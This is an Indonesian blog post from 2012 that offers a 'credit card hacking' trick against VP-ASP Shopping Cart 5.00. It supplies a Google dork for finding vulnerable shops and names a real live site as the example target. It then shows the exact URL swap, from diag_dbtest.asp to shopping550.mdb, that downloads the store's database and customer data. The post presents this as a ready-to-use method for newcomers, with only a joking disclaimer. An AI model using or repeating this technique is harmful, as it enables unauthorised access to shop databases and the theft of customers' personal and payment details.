Senin, 17 September 2012

Hacking Kartu Kredit | VP-ASP Shopping Cart 5.00 Exploit

kali ini Saya mau bagi-bagi trik buat Newbie kek gue, katanya sih Hacking Kartu Kredit ! wkwkwk tapi ya gak tau juga deng, gue cuma mau nulis Artikel doang :D ngasih makan Blog gue biar Alexa turun gitu Gay :*
Hacking Kartu Kredit | VP-ASP Shopping Cart 5.00 Exploit
Hacking Kartu Kredit | VP-ASP Shopping Cart 5.00 Exploit
disini gue bukan master dewa ato hacker, gue cuma Blogger yang mau nulis artikel hasil Copas eh hasil pemikiran gue sendiri Gay wkwkwk :P sesuai judulnya Hacking Kartu Kredit , ngeri betol ! udah Gay becandanya kita langsung aja ke topik masalah :
cara berikut sangat simpel kok gak perlu susah-susah amat ayok Gay semangat belajarnya :* muuaah 
step pertama :~# 
Pergi ke Google & ketik ini Dork berikut =  intitle: VP-ASP Shopping Cart 5,00 l
Setelah menemukan target web, contohnya seperti ini - www.tcsprogramming.net / shopping / diag_dbtest.asp (Demo Live)
terus Lo dapat melihat banyak detail seperti xDatabase xDatabas Lokasi xEmail & banyak gay, punya orang lain
nah kan banyak target, kita modifikasi aja URL target web yang mau di hack.cuma pake Exploit tinggal di tambahin di belakang URL-nya kok


Live Demo Gay :

Target - www.tcsprogramming.net / shopping / diag_dbtest.asp di coret buang laut ganti pake exploit : shopping550.mdb

Exploit - http://www.tcsprogramming.net/shopping/shopping550.mdb

Jadi di sini kita telah mengeksploitasi database untuk mendapatkan semua data dari website. Hanya Ganti diag_dbtest.asp untuk shopping/shopping550.mdb (xDatabase).
udah gay, di coba aja cara Hacking Kartu Kredit ! wkwkwk :D
gue gak bisa gay maenan begituan , gue cuma share-share aja . gunakan dengan bijak !

0 komentar:

Posting Komentar